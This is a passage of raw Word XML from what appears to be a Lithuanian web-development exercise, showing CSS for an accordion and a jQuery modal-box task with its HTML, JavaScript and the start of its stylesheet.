        <w:t xml:space="preserve">    box-shadow: 0 15px 20px -15px rgba(0, 0, 0, 0.3), 0 35px 50px -25px rgba(0, 0, 0, 0.3), 0 85px 60px -25px rgba(0, 0, 0, 0.1);</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lastRenderedPageBreak/>
        <w:t>.accordion-header {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border-bottom: 1px solid #DDE0E7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: #2a313a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-weight: 700;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>padding: 1.5rem;</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accordion-header:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: #F6F7F9;</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accordion-content {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>display: none;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border-bottom: 1px solid #DDE0E7;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background: #F6F7F9;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>padding: 1.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>color: #4a5666;</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accordion-header::before {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>content: '';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>vertical-align: middle;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>display: inline-block;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>width: .75rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>height: .75rem;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>border-radius: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background-color: #B1B5BE;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>margin-right: .75rem;</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active.accordion-header::before {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>background-color: #d66d75 ;</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E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CA19A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA19A4" w:rsidRPr="00CA19A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SUKURKITE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA19A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> IŠŠOKANTĮ LANGĄ (MODAL BOX)</w:t>
      </w:r>
      <w:r w:rsidR="00CA19A4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>Rezultatai:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00CA19A4" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="720" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00BD26FD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>Index.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;html lang="en"&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E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;meta http-equiv="X-UA-Compatible" content="ie=edge"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;link rel="stylesheet" href="style.css"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;title&gt;Modal jQuery&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;/head&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E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;h1&gt;Modal&lt;/h1&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 xml:space="preserve">    &lt;div class="overlay"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;div class="modal"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        &lt;h2&gt;Modal Box&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        &lt;p&gt;Lorem ipsum dolor sit amet consectetur adipisicing elit. Corrupti perspiciatis magnam eum sed similique rerum laboriosam amet adipisci explicabo ipsa.&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        &lt;button class="close"&gt;Close&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;/div&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 xml:space="preserve">    &lt;button class="open"&gt;Open&lt;/button&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 xml:space="preserve">    &lt;script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.1.0/jquery.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    &lt;script src="script.js"&gt;&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>&lt;/body&g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lastRenderedPageBreak/>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00BD26FD" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00A60CFB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>Script.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>$(".open").on("click", function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    $(".overlay, .modal").addClass("active");</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close, .overlay").on("click", function () {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    $(".overlay, .modal").removeClass("active");</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document).keyup(function (e) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    if (e.keyCode === 27) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">        $(".overlay, .modal").removeClass("active");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t xml:space="preserve">    }</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F84E17" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:left="720" w:right="284"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>3.</w:t>
      </w:r>
      <w:r w:rsidR="006B7945">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E350EA" w:rsidRPr="00AD4464">
        <w:t>Style.css</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:t>html {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>min-height: 100%;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="240" w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:tab/>
        <w:t>font-family: 'Nunito', sans-serif;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="CodeStyle"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
          <w:tab w:val="clear" w:pos="840"/>
